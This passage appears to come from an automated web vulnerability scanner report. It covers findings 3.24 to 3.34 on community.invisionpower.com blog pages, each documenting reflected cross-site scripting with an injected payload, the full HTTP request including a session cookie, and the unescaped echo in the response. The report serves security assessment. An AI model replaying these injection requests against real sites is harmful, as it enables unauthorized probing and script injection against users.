3.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=830c72b6f5c7a37fd2959ce58bae984c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:41 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:45 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwNjOyrgVcMFxcaAak; expires=Thu, 02-Feb-2012 23:12:45 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 115430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016?_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

3.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f3251d120798010dc874974665fe8aeb; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:11 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtjSyrgVcMFxcdAan; expires=Thu, 02-Feb-2012 23:13:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
ipt type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f70f43da4b3560f15ad879d5e298e90f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:01 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjKyrgVcMFxcuAam; expires=Thu, 02-Feb-2012 23:12:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9baa9e4d8417a95c12b288e362ecba30; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:11:30 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:11:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwsjS0rgVcMFxczAar; expires=Thu, 02-Feb-2012 23:11:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1&amp;_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

3.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c07155729daa7d6d40b594c2ff1a8698; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:49 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNrOwrgVcMFxc2gaw; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=22e858a8ab959b81f8a3bb18c5e84ab7; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjG2rgVcMFxcwwap; expires=Thu, 02-Feb-2012 23:12:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da?_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'>
...[SNIP]...

3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=2ce9d11814a97267fd707d92e4e4934e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:19 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMjKwrgVcMFxcJgab; expires=Thu, 02-Feb-2012 23:10:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=4b3644eca5f51a158215dd0c69ada06b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:54 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtDSxrgVcMFxcSQal; expires=Thu, 02-Feb-2012 23:09:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1&amp;_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

3.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f29e15c7c54cedf9b42b0ee026630452; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:05 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:07 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtjC1rgVcMFxcUgan; expires=Thu, 02-Feb-2012 23:13:07 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 89350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00?_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

3.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=82d2df6b70fbd655dc608f59349d762d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:28 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:32 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMbC0rgVcMFxcQwak; expires=Thu, 02-Feb-2012 23:13:32 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

